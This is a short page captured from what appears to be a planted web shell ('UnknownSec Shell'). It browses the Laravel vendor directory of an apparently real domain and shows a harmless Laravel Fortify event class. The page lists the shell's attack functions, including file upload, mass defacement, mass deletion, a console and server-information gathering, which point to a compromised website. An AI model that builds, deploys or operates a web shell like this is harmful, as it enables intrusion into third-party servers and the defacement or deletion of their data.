shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
laravel
/
fortify
/
src
/
Events
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
RecoveryCodesGenerated.php
<?php namespace Laravel\Fortify\Events; use Illuminate\Foundation\Events\Dispatchable; class RecoveryCodesGenerated { use Dispatchable; /** * The user instance. * * @var \App\Models\User */ public $user; /** * Create a new event instance. * * @param \App\Models\User $user * @return void */ public function __construct($user) { $this->user = $user; } }
© 2026 UnknownSec